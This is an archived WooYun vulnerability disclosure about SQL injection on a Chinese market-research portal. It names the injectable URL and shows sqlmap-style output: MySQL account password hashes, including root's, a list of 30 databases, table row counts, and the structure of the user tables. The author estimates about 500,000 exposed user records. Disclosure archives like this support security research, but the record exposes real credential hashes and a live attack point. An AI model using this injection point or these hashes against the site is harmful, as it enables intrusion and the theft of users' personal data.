乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开
中国市场调研第一门户网站 影响30库
http://app.3see.com/job/public/post.php?pid=2960
database management system users password hashes:[*] 3seeroot [3]: password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF password hash: *DF23C7658CA68A644959B4DE7C7A0E12328F94BD password hash: *E30B1F9102F0C1B751E96316EF6C2A859436EC5C[*] ailon [1]: password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF[*] cti_fbxt [1]: password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19[*] doosan [1]: password hash: *02839BAECB5BEB57BE071190FF2E70701BF66FB1[*] fbxt [1]: password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9[*] pureftpd [1]: password hash: *D00084C553C6D48F19095D04E2C2966D22263AAF[*] root [1]: password hash: *2D788DA8CDAE073D0DDB453E628EA003D8CDE85C[*] skw [1]: password hash: *FC60E807774B9731F82DBC0CDA1159DC6494C95D[*] wyt [1]: password hash: *64DF5C732B2AD96E34B95E4571C54011D342D7E5
影响30库
available databases [30]:[*] 3see[*] 3seedb[*] 3seeforum[*] ailon[*] air[*] bbs[*] bbs7vuchome[*] blog[*] boblog[*] cti_fbxt[*] discuz[*] doosan[*] fbxt[*] fenghui[*] fenghui08[*] info[*] information_schema[*] kstory[*] mysql[*] mysql__[*] new3see[*] newyearwork[*] pku_bbs[*] pureftpd[*] reportdata[*] sgbbs[*] sgblog[*] skw_bbs[*] skw_member[*] space
当前数据库没有多少数据 1000+而已
Database: 3see+-----------------------+---------+| Table | Entries |+-----------------------+---------+| t_makepagelog | 247155 || cms_data_comment | 145038 || payreport | 24432 || cms_data | 22338 || cms_create_log | 16043 || cojob_inbox | 12335 || t_filelog | 8966 || call_datasheet | 8525 || myjob_edu | 6382 || stat_sheet3see | 6305 || myjob_oldjob | 6298 || cms_data_picture | 6271 || myjob_resume | 5342 || freereports | 4061 || g_book | 3821 || myjob_item | 3250 || media_datasheet | 2890 || passwordtable | 2573 || manufacturer_new | 2498 || manufacturer | 2192 || cojob_place_new | 1798 || com_user | 1348 || members_homepage | 1331 || en_payreport | 1210 || com_manufacturer | 1117 || `3seecojob_coinfo` | 1112 || m_company | 1082 || m_user | 1069 || myjob_favorite | 968 || bidding | 773 || manu_art | 728 || com_homepages | 715 || com_bidding | 674 || com_book | 662 || orders | 633 || cms_page_module | 603 || cojob_store | 558 || myjob_city | 505 || myjob_letter | 489 || user_report | 435 || userdree | 433 || trainingtable | 393 || t_log | 391 || manu_art_pic | 366 || pv_stat | 354 || myjob_search | 346 || `3seemrarticle` | 342 || lib_mrarticle | 321 || mrconews | 319 || cms_topic_data | 318 || com_news | 297 || cojob_place | 256 || training | 246 || payreport_co | 192 || settlement | 152 || `3seesoftsurveyother` | 141 || newpic | 124 || company_job | 123 || diaocha2009 | 115 || myjob_mymsg | 113 || manu_friends | 104 || cms_page | 96 || new_hyclass | 96 || cms_data_type | 93 || library_datasheet | 90 || manufacturer_inform | 87 || cojob_deptandplace | 84 || cms_structure | 80 || t_menu | 71 || cojob_sessions | 65 || myjob_posttype | 63 || inquiry | 45 || p_commentary | 45 || ads_aditempic | 44 || cms_data_file | 38 || shclass | 36 || manufacturer_moban | 34 || training_qy_name | 33 || ads_aditem | 32 || advertisement | 30 || `3seehyclass` | 29 || adcategory | 29 || com_hyclass | 29 || m_admin | 24 || mrarticleclass | 24 || uparticle | 23 || com_uparticle | 22 || myjob_black | 20 || cati_literature | 16 || cms_topic | 16 || manufacturer_dongtai | 16 || mrarticle_neikan | 16 || cms_topic_comment | 15 || lib_topic | 14 || training_j | 14 || anli_down | 12 || cms_survey_item | 12 || mrarticle_zazhi | 12 || t_menuclass | 12 || t_power | 12 || trainingclass | 12 || cms_nextid | 11 || m_userinfo | 11 || manufacturer_anli | 11 || t_user | 11 || bytuijian | 10 || orderspayreport | 10 || ads_class | 9 || cms_default_module | 8 || com_seccanli | 8 || seccanli | 8 || training_xilie | 7 || com_anli | 6 || com_dongtai | 6 || cms_topic_group_type | 5 || cati_downloads | 4 || cati_softintro | 4 || cati_trends | 3 || cms_survey_main | 3 || cms_survey_position | 3 || manu_floatad | 3 || manufacturer_mbclass | 2 || cms_topic_group | 1 || tex | 1 || wytad_count | 1 |+-----------------------+---------+
直接把管理员的表dump all 了吧
看看其他的库
Database: 3seedb[122 tables]+-------------------------+| cdb_access || cdb_activities || cdb_activityapplies || cdb_adminactions || cdb_admincustom || cdb_admingroups || cdb_adminnotes || cdb_adminsessions || cdb_advcaches || cdb_advertisements || cdb_announcements || cdb_attachments || cdb_attachpaymentlog || cdb_attachtypes || cdb_banned || cdb_bbcodes || cdb_caches || cdb_campaigns || cdb_creditslog || cdb_crons || cdb_debateposts || cdb_debates || cdb_failedlogins || cdb_faqs || cdb_favorites || cdb_forumfields || cdb_forumlinks || cdb_forumrecommend || cdb_forums || cdb_imagetypes || cdb_invites || cdb_itempool || cdb_linkheader || cdb_magiclog || cdb_magicmarket || cdb_magics || cdb_medallog || cdb_medals || cdb_memberfields || cdb_membermagics || cdb_members || cdb_memberspaces || cdb_moderators || cdb_modworks || cdb_myposts || cdb_mytasks || cdb_mythreads || cdb_navs || cdb_onlinelist || cdb_onlinetime || cdb_orders || cdb_paymentlog || cdb_pluginhooks || cdb_plugins || cdb_pluginvars || cdb_polloptions || cdb_polls || cdb_posts || cdb_profilefields || cdb_projects || cdb_promotions || cdb_ranks || cdb_ratelog || cdb_regips || cdb_relatedthreads || cdb_reportlog || cdb_request || cdb_rewardlog || cdb_rsscaches || cdb_searchindex || cdb_sessions || cdb_settings || cdb_smilies || cdb_spacecaches || cdb_stats || cdb_statvars || cdb_styles || cdb_stylevars || cdb_subscriptions || cdb_tags || cdb_tasks || cdb_taskvars || cdb_templates || cdb_threads || cdb_threadsmod || cdb_threadtags || cdb_threadtypes || cdb_tradecomments || cdb_tradelog || cdb_tradeoptionvars || cdb_trades || cdb_typemodels || cdb_typeoptions || cdb_typeoptionvars || cdb_typevars || cdb_uc_admins || cdb_uc_applications || cdb_uc_badwords || cdb_uc_domains || cdb_uc_failedlogins || cdb_uc_feeds || cdb_uc_friends || cdb_uc_mailqueue || cdb_uc_memberfields || cdb_uc_members || cdb_uc_mergemembers || cdb_uc_newpm || cdb_uc_notelist || cdb_uc_pms || cdb_uc_protectedmembers || cdb_uc_settings || cdb_uc_sqlcache || cdb_uc_tags || cdb_uc_vars || cdb_usergroups || cdb_validating || cdb_videos || cdb_videotags || cdb_virtualforums || cdb_warnings || cdb_words || textt |+-------------------------+
39W+用户信息
Database: 3seedbTable: cdb_uc_members[12 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| email | char(32) || lastloginip | int(10) || lastlogintime | int(10) unsigned || myid | char(30) || myidkey | char(16) || password | char(32) || regdate | int(10) unsigned || regip | char(15) || salt | char(6) || secques | char(8) || uid | mediumint(8) unsigned || username | char(15) |+---------------+-----------------------+Database: 3seedbTable: cdb_members[48 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| accessmasks | tinyint(1) || adminid | tinyint(1) || avatarshowid | int(10) unsigned || bday | date || credits | int(10) || customaddfeed | tinyint(1) || customshow | tinyint(1) unsigned || dateformat | tinyint(1) || digestposts | smallint(6) unsigned || editormode | tinyint(1) unsigned || email | char(40) || extcredits1 | int(10) || extcredits2 | int(10) || extcredits3 | int(10) || extcredits4 | int(10) || extcredits5 | int(10) || extcredits6 | int(10) || extcredits7 | int(10) || extcredits8 | int(10) || extgroupids | char(20) || gender | tinyint(1) || groupexpiry | int(10) unsigned || groupid | smallint(6) unsigned || invisible | tinyint(1) || lastactivity | int(10) unsigned || lastip | char(15) || lastpost | int(10) unsigned || lastvisit | int(10) unsigned || newsletter | tinyint(1) || oltime | smallint(6) unsigned || pageviews | mediumint(8) unsigned || password | char(32) || pmsound | tinyint(1) || posts | mediumint(8) unsigned || ppp | tinyint(3) unsigned || prompt | tinyint(1) || regdate | int(10) unsigned || regip | char(15) || secques | char(8) || showemail | tinyint(1) || sigstatus | tinyint(1) || styleid | smallint(6) unsigned || timeformat | tinyint(1) || timeoffset | char(4) || tpp | tinyint(3) unsigned || uid | mediumint(8) unsigned || username | char(15) || xspacestatus | tinyint(1) |+---------------+-----------------------+
Database: discuz[53 tables]+--------------------+| cdb_access || cdb_adminactions || cdb_admingroups || cdb_adminnotes || cdb_adminsessions || cdb_advertisements || cdb_announcements || cdb_attachments || cdb_attachtypes || cdb_banned || cdb_bbcodes || cdb_blogcaches || cdb_buddys || cdb_creditslog || cdb_failedlogins || cdb_favorites || cdb_forumfields || cdb_forumlinks || cdb_forums || cdb_medals || cdb_memberfields || cdb_members || cdb_moderators || cdb_onlinelist || cdb_onlinetime || cdb_orders || cdb_paymentlog || cdb_plugins || cdb_pluginvars || cdb_pms || cdb_polls || cdb_posts || cdb_profilefields || cdb_ranks || cdb_ratelog || cdb_regips || cdb_rsscaches || cdb_searchindex || cdb_sessions || cdb_settings || cdb_smilies || cdb_stats || cdb_statvars || cdb_styles || cdb_stylevars || cdb_subscriptions || cdb_templates || cdb_threads || cdb_threadsmod || cdb_threadtypes || cdb_usergroups || cdb_validating || cdb_words |+--------------------+
9W+用户信息
Database: bbs+------------------+---------+| Table | Entries |+------------------+---------+| cdb_posts | 8084 || cdb_threads | 7461 || cdb_spacecaches | 2708 || cdb_memberfields | 543 || cdb_members | 543 || cdb_memberspaces | 542 || cdb_rsscaches | 461 || cdb_myposts | 258 || cdb_settings | 221 || cdb_mythreads | 126 || cdb_statvars | 75 || cdb_stylevars | 52 || cdb_stats | 50 || cdb_faqs | 34 || cdb_forumfields | 30 || cdb_forums | 29 || cdb_smilies | 29 || cdb_usergroups | 16 || cdb_crons | 13 || cdb_magics | 12 || cdb_projects | 11 || cdb_medals | 10 || cdb_bbcodes | 7 || cdb_onlinetime | 7 || cdb_ranks | 5 || cdb_onlinelist | 4 || cdb_admingroups | 3 || cdb_failedlogins | 1 || cdb_forumlinks | 1 || cdb_styles | 1 || cdb_templates | 1 |+------------------+---------+
这里也有部分用户信息
全部加起来应该有50W了
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
